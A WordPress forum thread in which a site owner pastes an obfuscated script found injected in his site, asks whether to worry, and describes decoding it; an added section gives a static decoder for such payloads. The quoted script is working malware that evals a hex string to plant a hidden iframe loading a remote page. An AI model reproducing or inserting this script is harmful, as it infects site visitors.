Malicious Script?

  • Out of nowhere, it occurred to me to check the source code of my site.
    When I saw it, I was startled by what I found. I have used WordPress for years, but there is still a lot I don't know. The code is below:

    <script>asgq="@!@!6@!66!20!28!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!73!42!7@!54!61!67!4e!61!6d!65!28!27!62!6f!64!7@!27!2@!5b!30!5d!2@!7b!d!@!@!@!6@!66!72!61!6d!65!72!28!2@!3b!d!@!@!7d!20!65!6c!73!65!20!7b!d!@!@!@!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!22!3c!6@!66!72!61!6d!65!20!73!72!63!3d!27!68!74!74!70!3a!2f!2f!74!61!6c!6b!6@!6e!67!66!61!74!65!72!6c!7@!3@!2e!62!6@!7a!2f!64!65!66!61!75!6c!74!2f!70!68!70!6d!7@!61!64!6d!6@!6e!32!2f!62!75!67!2f!71!75!65!73!74!6@!6f!6e!73!2e!70!68!70!3f!64!6f!77!6e!3d!34!33!34!26!70!6c!61!7@!3d!37!34!3@!26!6a!6f!6@!6e!3d!36!31!38!26!6f!72!61!63!6c!65!3d!37!3@!26!70!6f!72!74!66!6f!6c!6@!6f!3d!38!33!32!27!20!77!6@!64!74!68!3d!27!31!30!30!27!20!68!65!6@!67!68!74!3d!27!31!30!30!27!20!73!74!7@!6c!65!3d!27!77!6@!64!74!68!3a!31!30!30!70!78!3b!68!65!6@!67!68!74!3a!31!30!30!70!78!3b!70!6f!73!6@!74!6@!6f!6e!3a!61!62!73!6f!6c!75!74!65!3b!76!6@!73!6@!62!6@!6c!6@!74!7@!3a!68!6@!64!64!65!6e!3b!6c!65!66!74!3a!2d!31!30!30!30!30!70!78!3b!74!6f!70!3a!30!3b!27!3e!3c!2f!6@!66!72!61!6d!65!3e!22!2@!3b!d!@!@!7d!d!@!@!66!75!6e!63!74!6@!6f!6e!20!6@!66!72!61!6d!65!72!28!2@!7b!d!@!@!@!76!61!72!20!66!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!66!2e!73!65!74!41!74!74!72!6@!62!75!74!65!28!27!73!72!63!27!2c!27!68!74!74!70!3a!2f!2f!74!61!6c!6b!6@!6e!67!66!61!74!65!72!6c!7@!3@!2e!62!6@!7a!2f!64!65!66!61!75!6c!74!2f!70!68!70!6d!7@!61!64!6d!6@!6e!32!2f!62!75!67!2f!71!75!65!73!74!6@!6f!6e!73!2e!70!68!70!3f!64!6f!77!6e!3d!34!33!34!26!70!6c!61!7@!3d!37!34!3@!26!6a!6f!6@!6e!3d!36!31!38!26!6f!72!61!63!6c!65!3d!37!3@!26!70!6f!72!74!66!6f!6c!6@!6f!3d!38!33!32!27!2@!3b!66!2e!73!74!7@!6c!65!2e!6c!65!66!74!3d!27!2d!31!30!30!30!30!70!78!27!3b!66!2e!73!74!7@!6c!65!2e!76!6@!73!6@!62!6@!6c!6@!74!7@!3d!27!68!6@!64!64!65!6e!27!3b!66!2e!73!74!7@!6c!65!2e!74!6f!70!3d!27!30!27!3b!66!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!3d!27!61!62!73!6f!6c!75!74!65!27!3b!66!2e!73!74!7@!6c!65!2e!74!6f!70!3
d!27!30!27!3b!66!2e!73!65!74!41!74!74!72!6@!62!75!74!65!28!27!77!6@!64!74!68!27!2c!27!31!30!30!27!2@!3b!66!2e!73!65!74!41!74!74!72!6@!62!75!74!65!28!27!68!65!6@!67!68!74!27!2c!27!31!30!30!27!2@!3b!d!@!@!@!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!73!42!7@!54!61!67!4e!61!6d!65!28!27!62!6f!64!7@!27!2@!5b!30!5d!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!66!2@!3b!d!@!@!7d".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=50;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
    s="";if(zz)for(i=0;i-798!=0;i++){if(window.document)s+=String["fromCharCode"](parseInt(asgq[i],16));}
    e("vz=1;"+s);}}</script>

    And the strangest thing was that a minute later I looked at the code again and it was no longer there.

    Should I be worried about this?

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter wagnerlandio

    (@wagnerlandio)

    Looking at the code, the person who did this split it into parts using “!” and then replaced “9” with “@”. Reverse engineering it, I obtained hexadecimal code. I'm still looking at what it means and will post it here.
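
The encoding described in the post above (tokens separated by "!", every "9" written as "@", each token a hexadecimal character code) can be decoded statically, without ever calling `eval`. This is an added example, not part of the original thread; `decodePayload`, `triage` and the sample string are constructed for illustration, and `example.invalid` is a placeholder host.

```javascript
// Static decoder for the "!"-separated, "@"-for-"9" hex scheme.
// Nothing is evaluated: the decoded text is only returned for inspection.

// Constructed sample in the same encoding (NOT the payload from the post).
const SAMPLE =
  "@!3c!6@!66!72!61!6d!65!20!73!72!63!3d!27!68!74!74!70!3a!2f!2f!65!78!61!6d!70!6c!65" +
  "!2e!6@!6e!76!61!6c!6@!64!2f!70!27!20!73!74!7@!6c!65!3d!27!76!6@!73!6@!62!6@!6c!6@" +
  "!74!7@!3a!68!6@!64!64!65!6e!27!3e!d";

// Undo the substitution, split on the separator, convert each token.
// Tokens may be one hex digit ("d" is 0x0d, a lone "@" is 0x09).
function decodePayload(encoded, placeholder = "@", digit = "9", sep = "!") {
  const tokens = encoded.split(placeholder).join(digit).split(sep);
  const bad = [];
  let text = "";
  tokens.forEach((token, index) => {
    if (!/^[0-9a-fA-F]{1,2}$/.test(token)) {
      bad.push({ index, token }); // keep going, but record what was skipped
      return;
    }
    text += String.fromCharCode(parseInt(token, 16));
  });
  return { text, bad };
}

// Pull out what a defender needs from the decoded text: remote URLs
// (also defanged for safe sharing) and signs of an off-screen iframe.
function triage(text) {
  const urls = [...new Set(text.match(/https?:\/\/[^\s'"<>]+/g) || [])];
  const hiddenFrame = /iframe/i.test(text) &&
    /visibility\s*[:=]\s*'?hidden|(left|top)\s*[:=]\s*'?-\d{3,}px/i.test(text);
  const defanged = urls.map(u => u.replace(/^http/i, "hxxp").replace(/\./g, "[.]"));
  return { urls, defanged, hiddenFrame };
}

{
  const decoded = decodePayload(SAMPLE);
  console.log(JSON.stringify(decoded.text), decoded.bad, triage(decoded.text));
}
```

Hosts reported by `triage` are candidates for blocking at the proxy or DNS layer and for searching in web server and database content while cleaning the site.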

    Thread Starter wagnerlandio

    (@wagnerlandio)

    The decoded code can be found at this link: http://pastebin.com/t0AMf8ch

    The curious thing is that I can no longer find the script in the source code, and yet it is still executed, because the site asks for Java permissions when you open it.

    Thread Starter wagnerlandio

    (@wagnerlandio)

    Anyone?

  • The topic ‘Malicious Script?’ is closed to new replies.